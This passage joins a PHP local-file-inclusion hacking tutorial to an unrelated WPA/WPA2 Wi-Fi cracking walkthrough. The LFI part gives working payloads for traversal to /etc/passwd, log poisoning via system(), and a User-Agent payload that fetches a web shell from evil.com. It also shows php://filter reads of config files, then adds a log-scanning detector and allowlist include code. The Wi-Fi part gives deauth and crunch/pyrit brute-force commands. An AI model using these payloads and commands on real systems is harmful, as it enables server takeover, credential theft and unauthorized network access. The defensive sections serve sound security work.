It's important to note that not all web servers will show you error messages when there are errors. You can choose not to show users error messages on purpose, so it's harder to find vulnerable pages and they give out less information about what's happening in the code. Either way, let's see what more we can do with this.

Before we continue: from here on, I will be using Linux/Unix paths (/var/log/) and not C:\blabla\. In the case of vulnerabilities on Windows servers the concept remains the same; just change the path.

If I was to go to index.php?page=/etc/passwd what would happen?
That's right, the PHP script would try to include whatever the file /etc/passwd contains. And if /etc/passwd were to contain PHP code, that code would also get executed, meaning we could run any PHP command/function on the server, which is most definitely extremely dangerous. However, in this example (/etc/passwd) we won't have any PHP code, but the file will contain all the users on the server. /etc/passwd is typically the file you will try to include first in any LFI, simply because it will always be there on Linux servers.

Do you see the part in the argument value? Yah, that is not a typo :P This is to get rid of the .php part of the include code. Everything after will be discarded.



1.2 Finding LFI vulnerabilities

This part is going to be rather short, as I almost explained everything in the previous part. Nonetheless.
As said above, to check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages like the one above. However, as said, you won't always get an error message. Sometimes the script might even redirect you to the home page or something when it detects an error.

Here are a few examples of GET argument manipulation:
Normal URL → Manipulated, hopefully error-creating URL
www.site.com/index.php?id=1 → www.site.com/index.php?id=1awdasgfaeg
www.site.com/index.php?page=index → www.site.com/index.php?page=qqqqqqq
www.site.com/index.php?site=index → www.site.com/index.php?site=qqqqqq

Use your imagination... And for those who did not understand: the argument does not need to be "id" or "page" or "site". It can be anything.

If you do not get an error, but just a blank page, or you get redirected, you should try changing the GET argument(s) to /etc/passwd, /proc/self/environ and/or other files you know are present. You should even try just changing it to index.php or the relative path to some image or CSS file on the page, just to see if you are able to include anything. If the server is set up not to display error messages and there is a vulnerability, your code/file will still be included even though you didn't get any error message indicating there is a vulnerability there.

Confused about the text above? Read here:
In the text above I talked about /etc/passwd and /proc/self/environ, and about relative paths to images and/or CSS files on the server. If you did not understand some of these concepts I will try to explain further here.

Why try to include /etc/passwd or /proc/self/environ? Well, these are universal Linux files; they will always be present at those paths, and they are also useful in some cases. You can include any file you want, but for the sake of finding vulns, /etc/passwd, /etc/hosts, /etc/group and/or /proc/self/environ are good files to try.

What do I mean by "changing it to index.php or the relative path to some image or CSS file on the page"? Okay, so: if you change the possibly LFI-vulnerable GET argument to index.php and you see a slightly messed-up looking page, you might have been successful including index.php into index.php (assuming you are trying to exploit index.php; the file name really does not matter, it's just a proof of concept). Which again means you might be able to include other interesting files. When it comes to the relative path of an image or CSS file, I mean: let's say your possibly LFI-vulnerable script is www.site.com/abc.php?do=BLABLA. On that site there are various images, and you notice the images are located in www.site.com/images/. You should then try to change BLABLA to images/someimage.png to see if you can include that file. Likewise for CSS files or something similar: if a CSS file is located at www.site.com/css/style.css you should try changing BLABLA to css/style.css and see if you get the contents of style.css printed out on the page. Again, the file name or file location does not matter; this is simply to make sure we are able to include files. If you are successful including one of the files above, don't bother trying the other ones. Just move along to the attack part.



1.3 Exploiting LFI vulnerabilities

Lets say that you have successfully found a vulnerable page.

The URL is www.site2.com/index.php?page=index

First I will discuss the normal method of exploiting LFI vulnerabilities. Then I will move on to slightly more interesting methods of gaining some sort of access to the server. We have to remember that even though we might have an LFI vulnerability, this does not directly mean we have hacked our target, nor does it guarantee a successful breach.

For simplicity's sake, we will say that all we need to do is edit page=index to /etc/passwd and we will successfully include /etc/passwd. Nothing fancy. In a lot of cases it will be necessary to do ../../../../../../../../../etc/passwd, because the PHP script will try to include something relative to its own directory, so we need to go back lots of folders (../../../) until we reach / and then go to etc/ and read passwd. How many ../'s you use does not matter. Just use enough.


Normal method
www.site2.com/index.php?page=/etc/passwd gives us this output:
Quote
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh

Note that you will not get the same output(you might, but probably not). Don't worry. As long as you get something looking like this you are good.

So, we know this server for SURE is vulnerable to LFI. Let's discuss how we can get some access to this server. The file /etc/shadow is what contains the system's logins nowadays. But unless the web server is running as root (the highest-privilege user) you won't be able to read that file. You should/could try it nonetheless.

Furthermore, there is not really any easy way of getting more access than LFI to a server with normal inclusion. You can try lurking around a bit and see if you find any interesting files; you might get lucky. But normally, from this point on you move on to log poisoning, /proc/self/environ or other methods of attack.



Log poisoning
Once you know you can include file(s) with an LFI, you could try log poisoning to execute PHP code to gain higher access to the system.

In order to perform LFI log poisoning you need to be able to include the Apache error and/or access logs. Unfortunately for us I believe this has been made "impossible" in newer versions of Apache (the most used web server). Nonetheless, it does not stop us from trying.

First, try including various known locations for the apache logs. Here are a few common paths:
Quote
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log

These are the most common ones, as said. But you might find yourself in a lot of situations where things are not where they commonly are. If you find yourself failing on all of those common paths for the logs, just give up and move on to another method of attack. Most likely you won't find the log path, or you can't read it.

However, if you do manage to include the error and/or access log, you will most likely crash your browser if you are exploiting a huge site. Or you will see tons and tons and tons of access and/or error logs :P In this case, read further (even if your browser crashes).

Now, the whole point of including the error and/or access log(s) is to be able to include something we can modify. Because we can easily modify the access or error logs!

What we want to do is "poison" the logs with PHP code, then include them with the LFI and thereby execute the code! All you need to do is go to www.site2.com/<?php system("echo include($_GET['a']); > /tmp/mmmmmmm") ?> and you will poison the error log (because the file <?php system("echo include($_GET['a']); > /tmp/mmmmmmm") ?> will most likely not exist and therefore produce a 404 error).

If done correctly, you will now execute the following code by including the error log:
Code
<?php
system("echo include($_GET['a']); > /tmp/mmmmmmm")?>

This will write a file called mmmmmmm to /tmp/ which you can now include instead of the log files (just to make things a bit more practical). I won't go into further details on how to compromise a system. I basically served you your system's head on a plate. You have a working LFI, you poisoned the log file(s) and you have system() code execution at /tmp/mmmmmmm.



The /proc/self/environ method
The /proc/self/environ method is a lot like log poisoning, just a lot simpler. And more commonly found (nowadays anyway).

The environ file is simply a file that will spit out information about the "environment": that is, information about the system, the user, the process etc. Keep in mind that this isn't really a file, it's a stream, changing depending on the process environment.

The environ file/stream will print out, among other things, the user-agent. This is what we will use to execute PHP code.

If you just include the /proc/self/environ without any tampering, you should see something like this:
Quote
DOCUMENT_ROOT=/somepath/somepath/somepath GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=something=something HTTP_HOST=www.site2.com HTTP_USER_AGENT=Some user agent PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=41823 REQUEST_METHOD=GET REQUEST_URI=/index.php?do=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/somepath/somepath/somepath/index.php SCRIPT_NAME=/index.php SERVER_ADDR=127.0.0.1 SERVER_ADMIN=webmaster@site2.com SERVER_NAME=www.site2.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i Server at www.site2.com Port 80

You can see that it will output a lot of info. Like the user-agent, which we will use to tamper the output with.

Now, use your favorite user-agent switcher or tampering program. I can recommend tamper data or any user-agent switcher for Firefox.

Change your user-agent to <?php system("wget http://evil.com/myshell.txt -o /var/path/to/www/folder/myshell.php"); ?>

And voilà! The environ stream now outputs your user-agent PHP code back to the PHP script, which hopefully executes the code. If you did everything correctly, and everything worked as planned, you should now have a shell at /var/path/to/www/folder/myshell.php, which hopefully is www.site2.com/myshell.php with the contents of http://evil.com/myshell.txt. Of course this is all proof-of-concept stuff, so you would have to change a lot of paths and so on. But this is how you do it anyway.



PHP filter method(s)
The PHP filter method is the last method I will discuss in this tutorial for now. If you have other LFI techniques you are welcome to post them and I will include them in this tutorial, with your name all over it of course :P

The PHP filter method is basically just like normal LFI. Except, you can actually read the PHP source code of the files you include instead of executing the code! Which means, we can read configuration files and such for PHP scripts. Which sometimes can lead to some sort of access.

What we want to do is convert the data we get from reading the file into something that will not get executed when it goes through the include() function. Base64 encoding will do this. With PHP filters you can convert the data you read from a file to base64 before it gets included. This way, we will get base64 output in our browser, which, when decoded, will be PHP source code if you include a PHP file.

This is how you do it:
www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=YOURFILE

So, if you want to read config.php you do:
www.site2.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php

config.php will most of the time contain some interesting information if it exists, like MySQL logins and whatnot (depending on the script, of course). You will get something looking like this in your browser:
Quote
VGhpcyBpcyBhIGJhc2U2NCBzdHJpbmc=

You can decode it with this online tool: http://coderstoolbox.net/string/

More info on PHP filters: http://php.net/manual/en/wrappers.php.php
Other wrappers: http://www.php.net/manual/en/wrappers.php


 



Additionally I would like to mention the PHP session method. This one is a little more advanced, but if you know how cookies, sessions and tampering with these two work, you will get it. If you are able (not all sites "allow" this) to edit your PHP session value with some cookie editor or tamper program, you edit your session data to PHP code and include it. The path to the session file on the server is most of the time /tmp/sess_YOUR_SESSION_ID, but it can be located in other places too, like /var/lib/php5/, with the same name (sess_YOUR_SESSION_ID).


Now, if all of the above methods fail, not all hope is lost yet. If you find a file upload somewhere on the site, be it images, rar files, zip files, avatars, text files, PDFs, almost anything, you can tamper with the files, add some PHP code to the end of them or something, and try to include them. That is, if you know the file path after you upload it, of course.


Further details on how to root, steal, deface(lame) and whatnot will not be included in this tutorial. This tutorial is for security purposes only, and for creativity.
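The probes described in 1.2 and 1.3 (traversal, /etc/passwd and friends, /proc/self/environ, php://filter, and PHP tags planted in the request or User-Agent for log poisoning) are exactly what a defender looks for in the web server's access log. The following is an added example, not code from the original post: a small PHP scanner over constructed combined-format log lines, where the signature list and the sample lines are my own assumptions.

```php
<?php
// Added example (not from the original post): flag LFI probes in Apache
// combined-format access-log lines. Signatures and sample lines are constructed.
declare(strict_types=1);

// Combined format: ip - - [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';

// Indicator name => pattern, matched against the URL-decoded request line and the User-Agent.
const LFI_SIGNATURES = [
    'traversal'      => '~(?:\.\./|\.\.\\\\)~',
    'sensitive-file' => '~/etc/(?:passwd|shadow|hosts|group)\b~',
    'proc-environ'   => '~/proc/self/environ~',
    'php-filter'     => '~php://(?:filter|input)~i',
    'log-path'       => '~/(?:var/log|var/www/logs|usr/local/apache/logs|etc/httpd/logs)/~',
    'php-tag'        => '~<\?php~i',
];

/** Parse one log line into named fields, or return null if it is not in combined format. */
function parse_log_line(string $line): ?array
{
    if (!preg_match(LOG_RE, rtrim($line), $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'request' => $m[3],
            'status' => (int)$m[4], 'referer' => $m[5], 'ua' => $m[6]];
}

/**
 * Return the indicator names that fire for one parsed entry. The request is
 * URL-decoded twice so that %2e%2e%2f and double-encoded variants are seen plain.
 */
function lfi_indicators(array $entry): array
{
    $haystack = urldecode(urldecode($entry['request'])) . "\n" . $entry['ua'];
    $hits = [];
    foreach (LFI_SIGNATURES as $name => $re) {
        if (preg_match($re, $haystack)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample log, not real traffic (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
$sample = <<<'LOG'
203.0.113.5 - - [10/Oct/2011:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2011:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2011:13:55:44 +0000] "GET /index.php?page=..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?php echo 'poison'; ?>"
203.0.113.5 - - [10/Oct/2011:13:55:50 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=config.php HTTP/1.1" 200 964 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2011:13:56:01 +0000] "GET /css/style.css HTTP/1.1" 200 3310 "http://www.site2.com/" "Mozilla/5.0"
LOG;

// Print only the lines that trip at least one signature, with the signatures that fired.
foreach (explode("\n", $sample) as $line) {
    $entry = parse_log_line($line);
    if ($entry === null) {
        continue;
    }
    $hits = lfi_indicators($entry);
    if ($hits !== []) {
        printf("%s %s -> %s\n", $entry['ip'], $entry['request'], implode(',', $hits));
    }
}
```

Run it with the PHP CLI; the first and last sample lines stay quiet, the middle three are reported with the signatures they hit (the third one fires traversal, proc-environ and php-tag at once).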



1.4 Securing LFI vulnerabilities

Okay, this is the part where I don't know if I am supposed to laugh or cry. The only reason(okay, I know its easy to screw up.. But seriously..) I can think of why you would create a security issue like LFI is if you have absolutely no idea what you are doing. You are an idiot if you screw up that bad.

Honestly, just don't EVER have user input in your include() calls. Do an if/elseif/else or switch/case statement instead. Like this:

Using if/elseif/else statement(s):
Code
<?php
if (isset($_GET['page']))
{
     if ($_GET['page']=="home")
     {
          include("home.php");
     }
     elseif ($_GET['page']=="page1")
     {
          include("page1.php");
     }
     else
     {
          include("home.php");
     }
}
else
{
     include("home.php");
}
?>

Using switch/case(slightly more efficient than if statements in terms of lines of code):
Code
<?php
if (isset($_GET['page']))
{
     switch($_GET['page'])
     {
          case "home":
               include("home.php");
               break; // without break, PHP falls through and includes every following case as well

          case "page1":
               include("page1.php");
               break;

          default:
               include("home.php");
     }
}
else
{
     include("home.php");
}
?>


Don't EVER do like this:
Code
<?php
if (isset($_GET['page']))
{
     include($_GET['page'].".php");
}
else
{
     include("home.php");
}
?>
EVER
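As an added example (not from the original post), here is the same idea carried one step further: the ?page= value is only ever used as a key into a fixed table, and the resolved path is checked to lie inside the pages directory before include() sees it. The pages/ directory and file names are assumptions; the CLI self-check at the bottom feeds the hostile values from this tutorial through the router.

```php
<?php
// Added example (not from the original post): an allowlist router for the
// index.php?page=... pattern used throughout this tutorial. The user-supplied
// value never reaches include() as a path fragment, so "../", "/etc/passwd"
// and "php://filter/..." cannot select a file. Directory and file names are assumptions.
// (Remote includes via URL, mentioned in 1.1, additionally need allow_url_include=On; keep it Off.)
declare(strict_types=1);

// Fixed table: page key => file name inside the pages directory.
const PAGE_TABLE = [
    'home'  => 'home.php',
    'page1' => 'page1.php',
    'page2' => 'page2.php',
];

/**
 * Map the raw ?page= value to an absolute file path, or null if it cannot be used.
 * Unknown keys fall back to 'home', as in the original script.
 */
function resolve_page($requested, string $pagesDir): ?string
{
    // ?page[]=x arrives as an array; anything that is not a plain string counts as missing.
    $key = is_string($requested) && isset(PAGE_TABLE[$requested]) ? $requested : 'home';

    // Second line of defence: the resolved file must live inside $pagesDir. If a later
    // edit put '../config.php' into the table, this refuses it instead of including it.
    $base = realpath($pagesDir);
    $file = realpath($pagesDir . DIRECTORY_SEPARATOR . PAGE_TABLE[$key]);
    if ($base === false || $file === false) {
        return null;                                  // directory or page file missing
    }
    if (strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                  // resolved path escaped the pages directory
    }
    return $file;
}

// Request handling when served by the web server.
if (PHP_SAPI !== 'cli') {
    $file = resolve_page($_GET['page'] ?? null, __DIR__ . '/pages');
    if ($file === null) {
        http_response_code(500);
        exit('page unavailable');
    }
    include $file;
    exit;
}

// CLI self-check: build a throwaway pages directory and feed the router the hostile
// values from this tutorial. Every one of them must map to home.php or be refused.
$tmp = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir($tmp . '/pages', 0700, true);
foreach (PAGE_TABLE as $name) {
    file_put_contents("$tmp/pages/$name", "<?php echo '$name';");
}
$probes = [
    null,
    'page1',
    ['x'],
    '/etc/passwd',
    '../../../../etc/passwd',
    'php://filter/read=convert.base64-encode/resource=index.php',
    '/proc/self/environ',
];
foreach ($probes as $value) {
    $resolved = resolve_page($value, "$tmp/pages");
    printf("%-62s -> %s\n", json_encode($value, JSON_UNESCAPED_SLASHES),
           $resolved === null ? 'refused' : basename($resolved));
}
foreach (PAGE_TABLE as $name) {
    unlink("$tmp/pages/$name");
}
rmdir("$tmp/pages");
rmdir($tmp);
```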



Add from I_Learning_I (May 30, 2011) (RFI tutorial)
Quote
There is yet another way to prevent RFI(and LFI kinda), which is basically trimming the string to some special characters, like http:, //, /, you get the drill.
Here's an example:
Code
function check_url($page){

$page = str_replace("http://", "", $page);
$page = str_replace("/", "", $page);
$page = str_replace("\\", "", $page);
$page = str_replace("../", "", $page);
$page = str_replace(".", "", $page);
$page = str_replace("php", "", $page);

return $page;
}

echo "<title>Index</title>";
if(isset($_GET['id'])){
   $id=check_url($_GET['id']).".php";
   if(file_exists($id)){
      require($id);
   }else{
      require("index.php");
   }
}

My response though: this code can still be tampered with to include local files (LFI). So I would still go for an if/case statement. But it's not impossible to do a direct include on user input and have it still be secure; it's just a lot more to think about than if you just do an if/case statement.


Bye!

Manual WPA/WPA2 Hacking & Cracking


(This is by no means meant to be followed and actually used unless you have the time and resources.
Please use this as an informative post. This method is obsolete as there are tools mentioned at the bottom of the post to automate this process.
I am in no way responsible if you decide to follow this step by step and wind up failing your hdd. 
Aircrack can be hit & miss with correctly identifying a WPA Handshake).
 
 
 
Tools used:
aircrack suite
crunch
pyrit
wireless card capable of packet injection
 
 
To begin the process of hacking a targeted wireless network, set the wireless card into monitor mode by using the following command in terminal. (The entire process will be done within terminal as root)
 
airmon-ng start wlan0
 
This will create an interface named mon0. The name of the interface will sometimes vary from user to user.
 
If there are processes that cause the wireless card to not be set into monitor mode, run the following in terminal.
 
airmon-ng check kill
airmon-ng start wlan0
 
Next airodump will be used to scan for networks within range.
 
airodump-ng mon0
 
Wait for airodump to display the targeted network. Once the network is shown, stop airodump and copy down the BSSID. If you are documenting the process, now is also a good time to take note of what channel the network is on as well as any STATION associated with the BSSID.
 
Now begin capturing packets from the target network and write them to a file.
This can be done using the following command.
 
airodump-ng -c # --bssid XX:XX:XX:XX:XX:XX -w FILENAME mon0
Replace # with the network channel, XX:XX:XX:XX:XX:XX with the MAC of the network, and FILENAME with whatever you'd like.
 
airodump should now only be capturing packets from the targeted network, fixed to the specified channel.
Example
CH  1 ][ Elapsed: 19 s ][ 2016-03-26 03:11 ]

 BSSID              PWR   Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

XX:XX:XX:XX:XX:XX    -85       WPA2 CCMP   PSK  VICTIM

 BSSID    STATION       PWR   Rate  Lost Frames Probe

XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX   -34   36e-36e      3       170
If you are having trouble fixing your interface to the specified channel, you may need to run the following code.
 
airodump-ng -c # --bssid XX:XX:XX:XX:XX:XX -w FILENAME --ignore-negative-one mon0
 
Now capture a WPA handshake so that it can be cracked. 
This can be done by waiting for a user to connect to the network or using a deauth attack via aireplay.
Since this is a tutorial, run a deauth attack against a specified STATION on the network.
 
To do this, run the following code in a separate terminal
aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX mon0
Replace -a XX:XX:XX:XX:XX:XX with the BSSID and -c XX:XX:XX:XX:XX:XX with the STATION associated with the BSSID. --deauth 0 means that it will run very quickly at an interval of a whopping 0 seconds. Run this for a few seconds and then stop it via Ctrl+C.
 
If lucky, airodump should now say [ WPA XX:XX:XX:XX:XX:XX ]
where XX:XX:XX:XX:XX:XX is equal to the BSSID.
 
example from the top of airodump
CH  1 ][ Elapsed: 54 s ][ 2016-03-26 03:12 ][ WPA XX:XX:XX:XX:XX:XX ]

 BSSID              PWR   Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

XX:XX:XX:XX:XX:XX    -85       WPA2 CCMP   PSK  VICTIM

 BSSID    STATION       PWR   Rate  Lost Frames Probe

XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX   -34   36e-36e   187       2435
 
Now, if successful in capturing the handshake, stop airodump and begin cracking the file.
 
To be sure the handshake was captured, run the following in terminal.
aircrack-ng FILENAME-01.cap
replace FILENAME with whatever you chose to name your file while running airodump.
If you are unsure, look in your home directory for the .cap file.
 
The output should be something similar to this
root@kali:~# aircrack-ng FILENAME-01.cap
Opening FILENAME-01.cap
Read XXXX packets.
   #  BSSID              ESSID                     Encryption
   1  XX:XX:XX:XX:XX:XX  VICTIM                    WPA (1 handshake)
 
Next use crunch to generate a word-list and pyrit to crack the file by using GPU power with the following command.
!!WARNING!! Crunch can take up an enormous amount of space and may cause your hdd to fail. Adjust the code to your needs !!WARNING!!
crunch 8 14 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r FILENAME-01.cap -b XX:XX:XX:XX:XX:XX -i - attack_passthrough
8 is used because that is the minimum WPA/WPA2 passphrase length.
14 can be changed to a higher or lower value.
FILENAME-01.cap is your specified file.
-b XX:XX:XX:XX:XX:XX is the BSSID.
If you know the length of the password then you can enter X X;
for example, if I knew the password was only 8 characters or numbers, I would use 8 8.
 
You can also shorten the amount of time spent cracking if you already know the password.
For example, if I were cracking the password a1b2c3d4 the following code could be used instead.
crunch 8 8 abcd1234 | pyrit -r FILENAME-01.cap -b XX:XX:XX:XX:XX:XX -i - attack_passthrough
 
 
That concludes manually hacking & cracking a WPA/WPA2 secured wireless network.
This entire process can be automated with tools such as Reaver, wifite, & hashcat. (I will write tutorials as requested).
Online services are also available for cracking the handshake.
If you have any questions or comments regarding this process, please comment below.
 
I do not take any responsibility with what you decide to do with the information provided within this post.
Make sure you have authorization if using the methods described on a network other than your own.

Bye! 